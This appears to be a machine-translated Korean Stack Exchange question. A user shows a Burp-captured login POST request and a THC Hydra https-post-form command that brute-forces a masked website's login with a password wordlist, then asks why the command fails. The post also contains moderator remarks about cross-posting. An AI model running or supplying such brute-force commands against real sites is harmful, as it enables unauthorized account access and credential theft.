CygWin으로 THC Hydra 를 컴파일 하고 Burp (Windows 7 실행)를 사용했습니다. 튜토리얼을 읽었지만 Hydra가 그 일을 할 수없는 것 같습니다.
아래는 내가 Burp에서 얻은 정보 (일부 정보를 x 또는 y로 바꿨다)와 맨 아래에 명령 줄이 작동해야한다고 생각합니다. 불행히도 enterhydra를 친 후에 는 기본적인 구문 정보가 다시 나타납니다.
버프 출력 :
POST /login.php?action=in HTTP/1.1 Host: xxxxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://xxxxxx.com/login.php Cookie: visidincap526178=dBiizl5bQzKldS2WdMrM/ArT6VYAAAAAQUIPAAAAAAB6g3H+O0+VIC6UaHfrwDzi; visidincap821436=nmDb/MkQTXm2VsdHkiWxuzYCN1cAAAAAQUIPAA AAAADrVUYTxunztOfbWaA78Xgm; _ga=GA1.2.242869812.1465591208 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 82formsent=1&redirecturl=index.php&req_username=blop&req_password=blop&login=Login
이것은 실패로 생성됩니다.
사용자 이름 및 / 또는 비밀번호가 잘못되었습니다.
이것은 내 명령 줄입니다.
hydra -l yyyyy -P cygwin64/john.txt 123.456.789.012 https-post-form "/login.php:req_username=^USER^&req_password=^PASS^&login=Login:Wrong username and/or password." -V
보안 관련 게시물이 닫히고 삭제되었습니다.
—
Rory Alsop
@RoryAlsop : 이해가 안 돼요,이 사이트를 저에게 추천 하셨나요?
—
scalle
예. 그리고 크로스 포스트를 삭제했습니다.
—
Rory Alsop
아니오-이것은 모두 스택 교환입니다. Security Stack Exchange
—
Rory Alsop